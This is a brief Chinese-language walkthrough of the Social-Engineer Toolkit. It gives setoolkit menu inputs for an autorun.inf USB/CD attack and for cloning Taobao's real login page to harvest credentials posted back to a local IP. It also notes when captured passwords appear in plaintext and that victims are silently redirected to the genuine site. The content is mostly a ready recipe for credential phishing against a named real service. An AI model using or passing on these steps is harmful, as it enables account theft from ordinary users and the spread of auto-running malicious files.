社会工程学工具集setoolkit

1.USB/CD/DVD攻击

root@kali:~# setoolkit

set> 1

set> 3

autorun.inf文件，允许在双击磁盘时自动运行指定的某个文件。

---

2.站点克隆

root@kali:~# setoolkit

set> 依次输入1,2,3,2

set:webattack> IP address for the POST back in Harvester/Tabnabbing:192.168.1.182

set:webattack> Enter the url to clone:https://login.taobao.com/member/login.jhtml

设置完成后，访问192.168.1.182，相当于访问淘宝的登录页面。

第一次输入账户密码后，会自动跳转到真实的淘宝登录页面。

由于淘宝会对用户输入的密码进行加密，所以我们看到的是加密后的密码信息。

密文

如果我们克隆的站点，未对用户的输入进行加密，将会看到明文密码。

明文

注意：使用setoolkit时，会自动在当前运行的目录下生成.set目录。每做完一次操作，可以删除下该目录，否则可能会遇到一些奇怪的错误。

root@kali:~# pwd

/root

root@kali:~# rm -rf .set/